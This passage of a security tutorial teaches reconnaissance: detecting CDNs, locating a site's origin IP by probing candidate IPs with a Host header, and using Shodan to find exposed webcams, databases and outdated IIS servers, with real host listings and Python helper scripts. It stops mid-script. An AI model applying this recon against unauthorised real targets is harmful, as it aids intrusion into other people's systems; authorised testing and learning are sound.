Python Full Stack (5) Web Security Attack and Defense, Part 2: Information Gathering and an Introduction to sqlmap

I. Collecting the Real IP Address

1. Introduction to CDNs

CDN stands for Content Delivery Network.
The basic idea is to avoid, as far as possible, the bottlenecks on the Internet that hurt transfer speed and stability, so that content is delivered faster and more reliably. By placing node servers at many points in the network, a CDN forms an intelligent virtual overlay on top of the existing Internet; using real-time traffic data, the connection and load state of each node, and the distance and response time to the user, it redirects each request to the service node closest to that user.
The goal is to let users fetch content from nearby, relieve congestion on the Internet, and improve the response time of the site.
Advantages of a CDN

  • CDN nodes solve cross-carrier and cross-region access problems and greatly reduce latency;
  • Most requests are served at the CDN edge nodes, so the CDN offloads traffic and reduces the load on the origin server.

Disadvantage (from the tester's point of view)
The real IP of the origin server is hidden: resolving the domain name only yields a CDN node.
For more background see https://www.cnblogs.com/xinxiucan/p/7832368.html
Extension: load balancing
Load balancing is a technique for distributing load across multiple computers (a cluster), network links, CPUs, disks or other resources in order to optimize resource use, maximize throughput, minimize response time and avoid overloading any single unit.
It spreads the load (jobs, requests) across multiple operating units (servers, components) for execution, and is the standard answer to the problems of high performance, single points of failure (high availability) and scalability (horizontal scaling).
For more see https://www.cnblogs.com/fanBlog/p/10936190.html

2. Determining whether a CDN is in use (i.e. whether the resolved IP is the real one)

  • Method one: ping the domain name
ping www.baidu.com

Output:

Pinging www.a.shifen.com [14.215.177.38] with 32 bytes of data:
Reply from 14.215.177.38: bytes=32 time=49ms TTL=54
Reply from 14.215.177.38: bytes=32 time=49ms TTL=54
Reply from 14.215.177.38: bytes=32 time=48ms TTL=54
Reply from 14.215.177.38: bytes=32 time=49ms TTL=54

Ping statistics for 14.215.177.38:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 48ms, Maximum = 49ms, Average = 48ms

The first line shows that www.baidu.com is not answered directly: the name is a CNAME for www.a.shifen.com, and the address that replies (14.215.177.38) belongs to that distribution layer, not to the origin server. A CNAME into another domain is the typical footprint of a CDN (or a similar load-balancing front end), so the IP obtained this way is a node's address, not the real one. A CNAME on its own is only a hint; confirm it with method two.

  • Method two: ping the target from different regions, either through proxies or with an online ping service that has probes in many locations. If probes in different regions receive different IPs, the domain is served by a CDN; if they all agree on a single IP, that IP is most likely the real server.

Many sites use a CDN.
Requesting such a site directly by IP instead of by domain name usually does not return the site at all, because the node relies on the Host header to decide which site to serve; typical responses are:

403 – Forbidden
301 – Moved Permanently
307 – Temporary Redirect

3. Bypassing the CDN

If the target does not use a CDN, ping gives the real IP directly.
Otherwise, verify each candidate IP obtained from an online lookup service: request the site from that IP while sending the target domain in the Host header. If the real site comes back, the IP is the origin; a 403, a redirect or a generic default page means it is not.
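As an added example (not code from the original post), the following Python script turns the two checks above into functions: the CNAME test from method one, the multi-vantage comparison from method two, and the Host-header probe from section 3. resolve_local uses only the standard library and performs a live DNS lookup; the vantage-point names and the second IP in the test data are constructed, and the registered-domain comparison is deliberately naive (it ignores public suffixes such as co.uk).

```python
import http.client
import socket
from typing import Dict, List, Optional, Tuple


def registered_domain(name: str) -> str:
    """Last two labels of a hostname. Naive on purpose: it ignores public
    suffixes such as co.uk, which is acceptable for a first-pass check."""
    labels = name.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def cname_points_elsewhere(queried: str, canonical: str) -> bool:
    """Method one: the canonical (CNAME target) name lives under a different
    registered domain than the one we asked for, as with
    www.baidu.com -> www.a.shifen.com in the ping output above."""
    return registered_domain(queried) != registered_domain(canonical)


def looks_like_cdn(ips_by_vantage: Dict[str, List[str]],
                   queried: Optional[str] = None,
                   canonical: Optional[str] = None) -> bool:
    """Method two: different vantage points resolving the name to different
    IPs means an anycast/CDN layer sits in front of the origin. A CNAME into
    another domain counts as a hint as well. Several IPs from ONE vantage
    point prove nothing (plain DNS round robin), so that case is ignored."""
    distinct = {ip for ips in ips_by_vantage.values() for ip in ips}
    if len(ips_by_vantage) > 1 and len(distinct) > 1:
        return True
    if queried and canonical and cname_points_elsewhere(queried, canonical):
        return True
    return False


def resolve_local(name: str) -> Tuple[str, List[str]]:
    """Live lookup from this machine: (canonical_name, ips).
    gethostbyname_ex exposes the CNAME target, the same name ping prints."""
    canonical, _aliases, ips = socket.gethostbyname_ex(name)
    return canonical, ips


def probe_origin(ip: str, host: str, path: str = "/", timeout: float = 5.0) -> int:
    """Section 3's verification step done properly: connect to the candidate
    IP but send the real Host header. The site's normal page means the IP
    serves it; 403/301/307 or a generic default page means it does not."""
    conn = http.client.HTTPConnection(ip, 80, timeout=timeout)
    try:
        conn.request("GET", path, headers={"Host": host, "User-Agent": "recon-check"})
        return conn.getresponse().status
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "www.baidu.com"
    cname, ips = resolve_local(target)
    print(target, "->", cname, ips)
    print("CDN likely:", looks_like_cdn({"local": ips}, target, cname))
```

Run it with a domain name as the only argument; to apply method two, collect the IPs returned by an online multi-location ping service into the ips_by_vantage dictionary (one key per region) and pass that to looks_like_cdn. probe_origin needs network access and a candidate IP, so it is not part of the offline checks.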

II. Introduction to Shodan and Searching

1. Information gathering methods

  • Active information gathering:
    Interact with the target directly and collect information from that interaction, e.g. port scanning with nmap.
  • Passive information gathering:
    Go through a third-party engine, or query existing databases without touching the target at all, e.g. Google Hacking.

2. Introduction to the Shodan search engine

Google is generally regarded as the most powerful search engine, but Shodan is the one that should worry defenders most. Unlike Google, Shodan does not index web pages; it indexes the service banners of devices reachable on the Internet. It has been called the "dark Google": it finds servers, webcams, printers, routers and anything else connected to the Internet.

3. Shodan registration, login and search

Shodan: https://www.shodan.io/
The API key generated at registration is used to initialize the command-line tool and the client libraries (Python etc.).
Search methods:
(1) Type webcam in the Explore search box:
Example:
webcam
Open any result, e.g.
79.10.211.112
Ports 80, 81 and 8081 are open, the web server is Apache, and much more information is available.
(2) Use the port filter to search for a specific port number:
Example:

port:3306

Shown:
port:3306
Open any result, e.g.
103.26.42.140
Besides the exposed port 3306, much more can be learned about the host.
(3) Look up a specific IP address via the host view:
Example:
(screenshot: shodan host)
Opening the result gives
(screenshot: host detail)
Again, besides the open ports, much more information is available.
(4) Use the city filter to search within a specific city:
Example:
(screenshot: city)
Open any result, e.g.
(screenshot: city detail)
A lot of information is exposed.

III. Using the Shodan Command Line

Install the command-line tool:

pip install shodan

Show the help:

shodan -h

Output:

Usage: shodan [OPTIONS] COMMAND [ARGS]...                     
                                                              
Options:                                                      
  -h, --help  Show this message and exit.                     
                                                              
Commands:                                                     
  alert       Manage the network alerts for your account      
  convert     Convert the given input data file into a...     
  count       Returns the number of results for a search      
  data        Bulk data access to Shodan                      
  domain      View all available information for a domain     
  download    Download search results and save them in a...   
  honeyscore  Check whether the IP is a honeypot or not.      
  host        View all available information for an IP...     
  info        Shows general information about your account    
  init        Initialize the Shodan command-line              
  myip        Print your external IP address                  
  org         Manage your organization's access to Shodan     
  parse       Extract information out of compressed JSON...   
  radar       Real-Time Map of some results as Shodan finds...
  scan        Scan an IP/ netblock using Shodan.              
  search      Search the Shodan database                      
  stats       Provide summary information about a search...   
  stream      Stream data in real-time.                       
  version     Print version of this tool.                     

Initialize the CLI with your API key (a placeholder is used here; the key is a secret, so keep it out of shared notes and version control):

shodan init YOUR_API_KEY

Output:

Successfully initialized                    

Usage:
Count the Apache servers in the index:

shodan count apache

Output:

26271967                   

count only returns the number of matching records in Shodan's database, not the records themselves.
Search the Shodan database:

shodan search apache

Output:

23.225.88.249   9017            HTTP/1.1 404 Not Found\r\nDate: Wed, 12 Feb 2020 02:02:05 GMT\r\nServer: Apache/2.4.18 (Ubuntu)\r\nstatus: 404 Not Found\r\n
Content-Length: 0\r\nContent-Type: text/html; charset=utf-8\r\n\r\n                                                                                         
139.129.167.215 80              HTTP/1.1 200 OK\r\nDate: Wed, 12 Feb 2020 02:05:38 GMT\r\nServer: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.15\r\nLast-Mo
dified: Fri, 26 Aug 2016 02:32:44 GMT\r\nETag: "2a43-53af0545360e3"\r\nAccept-Ranges: bytes\r\nContent-Length: 10819\r\nContent-Type: text/html\r\n\r\n     
185.15.252.124  80      mail.domovpetra.cz      HTTP/1.0 401 Unauthorized\r\nDate: Wed, 12 Feb 2020 02:09:06 GMT\r\nServer: Apache/2.2.16 (Debian)\r\nX-Powe
red-By: PHP/5.3.3-7+squeeze15\r\nWWW-Authenticate: Basic realm="Administrace 185.15.252.124"\r\nVary: Accept-Encoding\r\nContent-Length: 74\r\nConnection: c
lose\r\nContent-Type: text/html\r\n\r\n                                                                                                                     
198.204.254.59  3092    raik.popepic.net        HTTP/1.1 200 OK\r\nDate: Wed, 12 Feb 2020 01:59:17 GMT\r\nServer: Apache/2.4.29 (Ubuntu)\r\nContent-Length: 
18\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n                                                                                                        
154.194.65.196  80              HTTP/1.1 200 OK\r\nDate: Wed, 12 Feb 2020 02:06:30 GMT\r\nServer: Apache\r\nUpgrade: h2\r\nConnection: Upgrade, close\r\nLas
t-Modified: Tue, 23 Oct 2018 07:08:31 GMT\r\nETag: "52e-578e00980d9c0"\r\nAccept-Ranges: bytes\r\nContent-Length: 1326\r\nVary: Accept-Encoding\r\nContent-T
ype: text/html\r\n\r\n                                                                                                                                      
103.6.244.220   80      eggfruit.icorehosting.com       HTTP/1.1 200 OK\r\nDate: Wed, 12 Feb 2020 02:06:27 GMT\r\nServer: Apache\r\nUpgrade: h2,h2c\r\nConne
ction: Upgrade\r\nLast-Modified: Sun, 13 Nov 2016 07:49:43 GMT\r\nETag: "c2-54129f75bb3c0"\r\nAccept-Ranges: bytes\r\nVary: Accept-Encoding,User-Agent\r\nCo
ntent-Length: 194\r\nContent-Type: text/html\r\n\r\n                                                                                                        
35.130.70.227   80      035-130-070-227.biz.spectrum.com        HTTP/1.1 302 Found\r\nDate: Wed, 12 Feb 2020 02:06:18 GMT\r\nServer: Apache\r\nX-Frame-Optio
ns: SAMEORIGIN\r\nLocation: https://35.130.70.227/server-manager/\r\nContent-Length: 221\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n             
107.148.199.115 7003    107.148.199.115.news10.shoesusoutlet.com        HTTP/1.1 404 Not Found\r\nDate: Wed, 12 Feb 2020 02:04:51 GMT\r\nServer: Apache/2.4.
29 (Ubuntu)\r\nstatus: 404 Not Found\r\nContent-Length: 0\r\nContent-Type: text/html; charset=utf-8\r\n\r\n                                                 
92.118.239.180  9500            HTTP/1.1 404 Not Found\r\nDate: Wed, 12 Feb 2020 02:05:38 GMT\r\nServer: Apache/2.4.18 (Ubuntu)\r\nstatus: 404 Not Found\r\n
Content-Length: 0\r\nContent-Type: text/html; charset=utf-8\r\n\r\n                                                                                         
38.72.78.36     80              HTTP/1.1 302 Found\r\nServer: Apache-Coyote/1.1\r\nCache-Control: private\r\nExpires: Wed, 31 Dec 1969 17:00:00 MST\r\nLocat
ion: https://38.72.78.36/\r\nContent-Length: 0\r\nDate: Wed, 12 Feb 2020 02:05:01 GMT\r\n\r\n                                                               
81.146.24.25    8085    host81-146-24-25.range81-146.btcentralplus.com  HTTP/1.1 401 Unauthorized\r\nServer: Apache\r\nConnection: Close\r\nContent-type: te
xt/html\r\nWWW-Authenticate: Digest realm="DSLForum CPE Management", algorithm=MD5, qop=auth, stale=FALSE, nonce="7ab612def3d537d4f3bea0af684dfb0e", opaque=
"5ccc069c403ebaf9f0171e9517f40e41"\r\n\r\n                                                                                                                  
-- More  --                                                                                                                                                                  

Because many results are returned, press Enter to page further down.
This is relatively slow.
Search for IIS 6.0 services:

shodan search microsoft iis 6.0

Output:

81.2.194.180    80      pidi.forpsi.com HTTP/1.1 200 OK\r\nDate: Thu, 13 Feb 2020 01:19:06 GMT\r\nContent-Length: 2981\r\nContent-Type: text/html\r\nContent
-Location: http://roga.cz/index.htm\r\nLast-Modified: Wed, 29 Nov 2006 14:51:13 GMT\r\nAccept-Ranges: bytes\r\nETag: "808672d0c513c71:65e"\r\nServer: Micros
oft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\n\r\n                                                                                                                
45.201.116.21   80              HTTP/1.1 200 OK\r\nContent-Length: 20205\r\nContent-Type: text/html\r\nContent-Location: http://newsky-mold.com/index.html\r
\nLast-Modified: Wed, 30 May 2018 04:26:52 GMT\r\nAccept-Ranges: bytes\r\nETag: "2094726fcef7d31:a4b"\r\nServer: Microsoft-IIS/6.0\r\nDate: Wed, 12 Feb 2020
 17:20:17 GMT\r\n\r\n                                                                                                                                       
62.1.8.111      80      lifestyletravel.forth-crs.gr;leto.forth-crs.gr;levriero.forth-crs.gr;ferries-greece.forth-crs.gr;marinetours.forth-crs.gr;dimidis.fo
rth-crs.gr;itertravel.forth-crs.gr;greekferries2.forth-crs.gr;flightsgr.forth-crs.gr;travelpass.forth-crs.gr;greciacultura.forth-crs.gr;levanteferries.forth
-crs.gr;magnatravel.forth-crs.gr;w2.forth-crs.gr;aquaferries.forth-crs.gr;airexelixi.forth-crs.gr;aliweb.forth-crs.gr;imis.forth-crs.gr;dorkastravel.forth-c
rs.gr;webstatswwwn2.forth-crs.gr;bestway.forth-crs.gr;ticketpad.forth-crs.gr;folegandrostravel.forth-crs.gr;travelplan.forth-crs.gr;aegeastravel.forth-crs.g
r;wwwn2.forth-crs.gr;myways.forth-crs.gr;greekferries.forth-crs.gr;ioniangroup.forth-crs.gr;piraeustravelservices.forth-crs.gr;greekferriesclub.forth-crs.gr
;keatours.forth-crs.gr;zorpidis.forth-crs.gr;ctrs.forth-crs.gr;ostriatravel.forth-crs.gr;mastravel.forth-crs.gr;airmaritime.forth-crs.gr;ferries-greece2.for
th-crs.gr;greece-ferries.forth-crs.gr;grab.forth-crs.gr;exodostravel.forth-crs.gr       HTTP/1.1 403 Forbidden\r\nContent-Length: 218\r\nContent-Type: text/
html\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\nDate: Thu, 13 Feb 2020 01:18:39 GMT\r\n\r\n                                                   
103.30.41.143   80              HTTP/1.1 200 OK\r\nContent-Length: 431\r\nContent-Type: text/html\r\nContent-Location: http://103.30.41.143/index.html\r\nLa
st-Modified: Sat, 08 Feb 2020 20:27:59 GMT\r\nAccept-Ranges: bytes\r\nETag: "e4f95c41beded51:fec"\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\nD
ate: Thu, 13 Feb 2020 01:16:02 GMT\r\n\r\n                                                                                                                  
204.44.105.62   80      a.h.qn.holcldttl.com    HTTP/1.1 200 OK\r\nConnection: close\r\nDate: Thu, 13 Feb 2020 01:20:28 GMT\r\nServer: Microsoft-IIS/6.0\r\n
X-Powered-By: ASP.NET\r\nX-Powered-By: PHP/5.2.17\r\nContent-type: text/html\r\n\r\n                                                                        
172.80.58.134   80              HTTP/1.1 200 OK\r\nContent-Length: 53244\r\nContent-Type: text/html\r\nContent-Location: http://828816.com/index.htm\r\nLast
-Modified: Thu, 03 Jan 2019 05:05:36 GMT\r\nAccept-Ranges: bytes\r\nETag: "14266bf621a3d41:3a86"\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: WAF/2.0\r\nDa
te: Thu, 13 Feb 2020 01:21:05 GMT\r\n\r\n                                                                                                                   
203.231.127.53  80              HTTP/1.1 302 Moved Temporarily\r\nConnection: close\r\nDate: Thu, 13 Feb 2020 01:21:12 GMT\r\nServer: Microsoft-IIS/6.0\r\nX
-Powered-By: ASP.NET\r\nlocation: http://ebiz.heung-a.com/\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n                                                
66.254.180.167  80              HTTP/1.1 403 Forbidden\r\nContent-Length: 218\r\nContent-Type: text/html\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.N
-- More  --                                                                                                                                                 

Restrict the output to specific fields:

shodan search --fields ip_str,port,hostname tomcat

Output:

121.41.11.14    8089
42.101.46.78    8081
66.35.73.105    8081
121.78.79.82    8081
213.175.217.202 8080
185.42.238.41   80
117.78.8.169    8081
64.82.245.252   8080
80.91.88.130    49153
15.185.130.138  3117
47.93.22.104    8081
90.147.33.88    8080
167.179.3.31    80
120.24.193.235  8081
139.196.198.125 80
39.105.222.63   8083
39.96.23.184    8083
58.64.130.35    8181
34.196.124.24   80
54.252.212.190  9944
54.252.212.190  8043
52.66.245.176   5357
18.144.80.167   2021
67.43.25.97     80
202.115.162.45  8081
-- More  --                                                                                                                                                             

Get the information held for a specific IP address:

shodan host 213.136.73.36

Output:

213.136.73.36
Hostnames:               -
City:                    Nürnberg
Country:                 Germany
Organization:            Contabo GmbH
Updated:                 2020-02-06T20:35:42.365722
Number of open ports:    3

Ports:
     22/tcp OpenSSH (7.6p1 Ubuntu-4ubuntu0.3)
     25/tcp Exim smtpd (4.90_1)
     80/tcp                                                                                                                                                            

Show account information (credits are what filtered searches, result pages beyond the first and on-demand scans consume):

shodan info

Output:

Query credits available: 0
Scan credits available: 0                                                                                                                                                        

Show your own external IP address:

shodan myip

Output:

139.202.xx.xxx                                                                                                                                                      

Check whether an IP is a honeypot (the score runs from 0.0, almost certainly a real system, to 1.0, almost certainly a honeypot):
Honeypot technology:
Essentially a deception technique aimed at the attacker: decoy hosts, network services or data are set up to lure the attacker into attacking them, so that the attack can be captured and analysed. The defender learns the attacker's tools and methods, can infer intent and motive, gets a clear picture of the threats they face, and can strengthen the protection of the real systems through technical and management measures.

shodan honeyscore 213.136.73.36

Output:

Score: 0.3                                                                                                                                                      

IV. Using Shodan from Python

import os
import shodan

# Constant, upper case; the key is a secret, so read it from the
# environment instead of hard-coding it in the script.
SHODAN_API_KEY = os.environ.get('SHODAN_API_KEY', 'YOUR_API_KEY')

# Initialize the client
api = shodan.Shodan(SHODAN_API_KEY)
try:
    # page=1: first page of results (filters and later pages consume query credits)
    result = api.search('tomcat', page=1)
    print(result['total'])
except shodan.APIError as e:
    print('Shodan API error:', e)

Output:

85435

A second test:

import os
import shodan

# Constant, upper case; read the secret key from the environment
SHODAN_API_KEY = os.environ.get('SHODAN_API_KEY', 'YOUR_API_KEY')

# Initialize the client
api = shodan.Shodan(SHODAN_API_KEY)
try:
    # Everything Shodan holds for one IP: location, org, ports and one banner per service
    result = api.host('213.136.73.36')
    print(result)
    print(result['country_name'])
except shodan.APIError as e:
    print('Shodan API error:', e)

Output:

{'region_code': '02', 'ip': 3582478628, 'postal_code': '90475', 'country_code': 'DE', 'city': 'Nürnberg', 'dma_code': None, 'last_update': '2020-02-06T20:35:42.365722', 'latitude': 49.4075, 'tags': [], 'area_code': None, 'country_name': 'Germany', 'hostnames': ['-'], 'org': 'Contabo GmbH', 'data': [{'_shodan': {'id': '944a19e4-6c9b-4488-8146-125c332e4558', 'options': {}, 'ptr': True, 'module': 'smtp', 'crawler': 'd264629436af1b777b3b513ca6ed1404d7395d80'}, 'product': 'Exim smtpd', 'hash': 238085194, 'version': '4.90_1', 'opts': {}, 'ip': 3582478628, 'isp': 'Contabo GmbH', 'os': None, 'cpe': ['cpe:/a:exim:exim:4.90_1'], 'port': 25, 'hostnames': ['-'], 'location': {'city': 'Nürnberg', 'region_code': '02', 'area_code': None, 'longitude': 11.164899999999989, 'country_code3': 'DEU', 'country_name': 'Germany', 'postal_code': '90475', 'dma_code': None, 'country_code': 'DE', 'latitude': 49.4075}, 'timestamp': '2020-02-06T20:35:42.365722', 'domains': ['-.'], 'org': 'Contabo GmbH', 'data': '220 port22.eu ESMTP Exim 4.90_1 Ubuntu Thu, 06 Feb 2020 21:35:38 +0100\r\n250-port22.eu Hello 228.224.176.180 [228.224.176.180]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-CHUNKING\r\n250-PRDR\r\n250 HELP\r\n', 'asn': 'AS51167', 'transport': 'tcp', 'ip_str': '213.136.73.36'}, {'info': 'protocol 2.0', '_shodan': {'id': None, 'options': {}, 'ptr': True, 'module': 'ssh', 'crawler': '5faf2928ceb560cb4276cc1b4660b2d763cc6397'}, 'product': 'OpenSSH', 'hash': 885925491, 'version': '7.6p1 Ubuntu-4ubuntu0.3', 'location': {'city': 'Nürnberg', 'region_code': '02', 'area_code': None, 'longitude': 11.164899999999989, 'country_code3': 'DEU', 'country_name': 'Germany', 'postal_code': '90475', 'dma_code': None, 'country_code': 'DE', 'latitude': 49.4075}, 'opts': {}, 'ip': 3582478628, 'isp': 'Contabo GmbH', 'os': None, 'cpe': ['cpe:/a:openbsd:openssh:7.6p1 Ubuntu-4ubuntu0.3'], 'port': 22, 'hostnames': ['-'], 'ssh': {'hassh': 'b12d2871a1189eff20364cf5333619ee', 'fingerprint': 
'6f:71:c5:39:d8:34:55:01:fc:e3:41:67:02:81:fc:71', 'mac': 'hmac-sha2-256', 'cipher': 'aes128-ctr', 'key': 'AAAAB3NzaC1yc2EAAAADAQABAAABAQDBehzX1E+RxyPeN17W8k7NjGct/X+cT0UakEkpG8pCtXq2\nc1yD7m5fkLbu2V0ELS2ip0ldvNF8IZnoEndWPxcyvaz1nMEugtUqOVOEj93EtXXXOqmid7QdulQZ\n6xSAFeFE4D65VmScQi7eI9iM/OhmlGFOgAyFH1ELJjwic1nX2aX2YOwJrxmsebkSKd1vzBP1zYcE\ngiegwllez196hbcn/FkcWvcKcyo27pGtVmH8TheepnyRk2M2vSTyNcG8o1VNhUCFRsKEfzMWd92i\nM5+5U8SzfhA+F9hxvOJ7XfRbYZd9V/2UwFgia6llAj0n1eSrLN0u3HqLhnI4f9uUl3H9\n', 'kex': {'languages': [''], 'server_host_key_algorithms': ['ssh-rsa', 'rsa-sha2-512', 'rsa-sha2-256', 'ecdsa-sha2-nistp256', 'ssh-ed25519'], 'encryption_algorithms': ['[email protected]', 'aes128-ctr', 'aes192-ctr', 'aes256-ctr', '[email protected]', '[email protected]'], 'kex_follows': False, 'unused': 0, 'kex_algorithms': ['curve25519-sha256', '[email protected]', 'ecdh-sha2-nistp256', 'ecdh-sha2-nistp384', 'ecdh-sha2-nistp521', 'diffie-hellman-group-exchange-sha256', 'diffie-hellman-group16-sha512', 'diffie-hellman-group18-sha512', 'diffie-hellman-group14-sha256', 'diffie-hellman-group14-sha1'], 'compression_algorithms': ['none', '[email protected]'], 'mac_algorithms': ['[email protected]', '[email protected]', '[email protected]', '[email protected]', '[email protected]', '[email protected]', '[email protected]', 'hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1']}, 'type': 'ssh-rsa'}, 'timestamp': '2020-01-27T19:13:34.325121', 'domains': ['-.'], 'org': 'Contabo GmbH', 'data': 'SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3\nKey type: ssh-rsa\nKey: AAAAB3NzaC1yc2EAAAADAQABAAABAQDBehzX1E+RxyPeN17W8k7NjGct/X+cT0UakEkpG8pCtXq2\nc1yD7m5fkLbu2V0ELS2ip0ldvNF8IZnoEndWPxcyvaz1nMEugtUqOVOEj93EtXXXOqmid7QdulQZ\n6xSAFeFE4D65VmScQi7eI9iM/OhmlGFOgAyFH1ELJjwic1nX2aX2YOwJrxmsebkSKd1vzBP1zYcE\ngiegwllez196hbcn/FkcWvcKcyo27pGtVmH8TheepnyRk2M2vSTyNcG8o1VNhUCFRsKEfzMWd92i\nM5+5U8SzfhA+F9hxvOJ7XfRbYZd9V/2UwFgia6llAj0n1eSrLN0u3HqLhnI4f9uUl3H9\nFingerprint: 6f:71:c5:39:d8:34:55:01:fc:e3:41:67:02:81:fc:71\n\nKex 
Algorithms:\n\tcurve25519-sha256\n\[email protected]\n\tecdh-sha2-nistp256\n\tecdh-sha2-nistp384\n\tecdh-sha2-nistp521\n\tdiffie-hellman-group-exchange-sha256\n\tdiffie-hellman-group16-sha512\n\tdiffie-hellman-group18-sha512\n\tdiffie-hellman-group14-sha256\n\tdiffie-hellman-group14-sha1\n\nServer Host Key Algorithms:\n\tssh-rsa\n\trsa-sha2-512\n\trsa-sha2-256\n\tecdsa-sha2-nistp256\n\tssh-ed25519\n\nEncryption Algorithms:\n\[email protected]\n\taes128-ctr\n\taes192-ctr\n\taes256-ctr\n\[email protected]\n\[email protected]\n\nMAC Algorithms:\n\[email protected]\n\[email protected]\n\[email protected]\n\[email protected]\n\[email protected]\n\[email protected]\n\[email protected]\n\thmac-sha2-256\n\thmac-sha2-512\n\thmac-sha1\n\nCompression Algorithms:\n\tnone\n\[email protected]\n\n', 'asn': 'AS51167', 'transport': 'tcp', 'ip_str': '213.136.73.36'}, {'_shodan': {'id': '4493ec63-9af0-46b3-af2d-1f6da2e3b33a', 'options': {}, 'ptr': True, 'module': 'http', 'crawler': '4aca62e44af31a464bdc72210b84546d570e9365'}, 'hash': -945966338, 'os': None, 'opts': {}, 'ip': 3582478628, 'isp': 'Contabo GmbH', 'http': {'html_hash': -1259818618, 'robots_hash': None, 'redirects': [], 'securitytxt': None, 'title': '404 Not Found', 'sitemap_hash': None, 'robots': None, 'favicon': None, 'host': '213.136.73.36', 'html': '<html>\n  <head>\n    <title>404 Not Found</title>\n    <link rel=\'stylesheet\' href=\'style/style.css\' type=\'text/css\'/>\n  </head>\n  <body bgcolor="#ffffff" text="#000000" link="#2020ff" vlink="#4040cc">\n    <h2>404 Not Found</h2>\n    <p>The requested URL was not found on this server.</p>\n\n  </body>\n\n</html>\n', 'location': '/', 'components': {}, 'server': 'xxx', 'sitemap': None, 'securitytxt_hash': None}, 'port': 80, 'hostnames': ['-'], 'location': {'city': 'Nürnberg', 'region_code': '02', 'area_code': None, 'longitude': 11.164899999999989, 'country_code3': 'DEU', 'country_name': 'Germany', 'postal_code': '90475', 'dma_code': None, 'country_code': 'DE', 
'latitude': 49.4075}, 'timestamp': '2020-01-26T07:14:55.014514', 'domains': ['-.'], 'org': 'Contabo GmbH', 'data': 'HTTP/1.1 404 Not Found\r\nServer: xxx\r\nContent-Type: text/html; charset=utf-8\r\nDate: Sun, 26 Jan 2020 07:32:11 GMT\r\nLast-Modified: Sun, 26 Jan 2020 07:32:11 GMT\r\nAccept-Ranges: bytes\r\nConnection: close\r\nCache-Control: no-cache,no-store\r\n\r\n', 'asn': 'AS51167', 'transport': 'tcp', 'ip_str': '213.136.73.36'}], 'asn': 'AS51167', 'isp': 'Contabo GmbH', 'longitude': 11.164899999999989, 'country_code3': 'DEU', 'domains': ['-.'], 'ip_str': '213.136.73.36', 'os': None, 'ports': [80, 25, 22]}
Germany

The same data can also be fetched through the REST API in a browser, and the returned JSON processed to extract the fields of interest.
Parameters and return values are documented at https://developer.shodan.io/api
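The host record printed above is a large nested dictionary; what a tester actually wants from it is a short service table, the CPE identifiers to check against a vulnerability database, and any weak crypto the exposed services still offer. The following Python, added here and not part of the original post or of the shodan library, does that. SAMPLE_HOST is a constructed, trimmed-down copy of the api.host() output shown above (same IP and services, long banner fields dropped), and the LEGACY_SSH list is the example's own choice of deprecated algorithms.

```python
from typing import Any, Dict, List, Set, Tuple

# Deprecated SSH algorithms worth flagging. Assumption: this list is the
# example's own choice, not something Shodan provides.
LEGACY_SSH = {
    "diffie-hellman-group1-sha1", "diffie-hellman-group14-sha1",
    "hmac-sha1", "hmac-md5", "ssh-rsa", "3des-cbc", "arcfour",
}

# Constructed sample: a trimmed version of the api.host() result shown
# above (same IP, same three services, long banner fields dropped).
SAMPLE_HOST: Dict[str, Any] = {
    "ip_str": "213.136.73.36",
    "org": "Contabo GmbH",
    "country_name": "Germany",
    "ports": [80, 25, 22],
    "data": [
        {"port": 25, "transport": "tcp", "product": "Exim smtpd",
         "version": "4.90_1", "cpe": ["cpe:/a:exim:exim:4.90_1"]},
        {"port": 22, "transport": "tcp", "product": "OpenSSH",
         "version": "7.6p1 Ubuntu-4ubuntu0.3",
         "cpe": ["cpe:/a:openbsd:openssh:7.6p1 Ubuntu-4ubuntu0.3"],
         "ssh": {"kex": {
             "kex_algorithms": ["curve25519-sha256",
                                "diffie-hellman-group14-sha256",
                                "diffie-hellman-group14-sha1"],
             "mac_algorithms": ["hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"],
             "encryption_algorithms": ["aes128-ctr", "aes256-ctr"],
             "server_host_key_algorithms": ["ssh-rsa", "rsa-sha2-512", "ssh-ed25519"],
         }}},
        {"port": 80, "transport": "tcp",
         "http": {"server": "xxx", "title": "404 Not Found"}},
    ],
}


def summarize_host(host: Dict[str, Any]) -> List[Tuple[int, str, str, str]]:
    """Collapse a host record into (port, transport, product, version) rows
    sorted by port. Banners without a fingerprinted product fall back to the
    HTTP Server header when there is one."""
    rows = []
    for svc in host.get("data", []):
        product = svc.get("product") or svc.get("http", {}).get("server") or "?"
        version = svc.get("version") or ""
        rows.append((int(svc["port"]), svc.get("transport", "tcp"), product, version))
    return sorted(rows)


def legacy_ssh_algorithms(host: Dict[str, Any]) -> Set[str]:
    """Deprecated algorithms the SSH service still advertises in its KEXINIT."""
    offered: Set[str] = set()
    for svc in host.get("data", []):
        kex = svc.get("ssh", {}).get("kex", {})
        for key in ("kex_algorithms", "mac_algorithms",
                    "encryption_algorithms", "server_host_key_algorithms"):
            offered.update(kex.get(key, []))
    return offered & LEGACY_SSH


def cpes(host: Dict[str, Any]) -> List[str]:
    """CPE identifiers Shodan attached to the banners: the keys to look up
    in a vulnerability database."""
    found: Set[str] = set()
    for svc in host.get("data", []):
        found.update(svc.get("cpe", []))
    return sorted(found)


if __name__ == "__main__":
    import os
    import sys
    if len(sys.argv) > 1:          # live lookup: python summarize.py <ip>
        import shodan              # pip install shodan
        host = shodan.Shodan(os.environ["SHODAN_API_KEY"]).host(sys.argv[1])
    else:                          # offline: use the constructed sample
        host = SAMPLE_HOST
    print(host["ip_str"], host.get("org"), host.get("country_name"))
    for port, transport, product, version in summarize_host(host):
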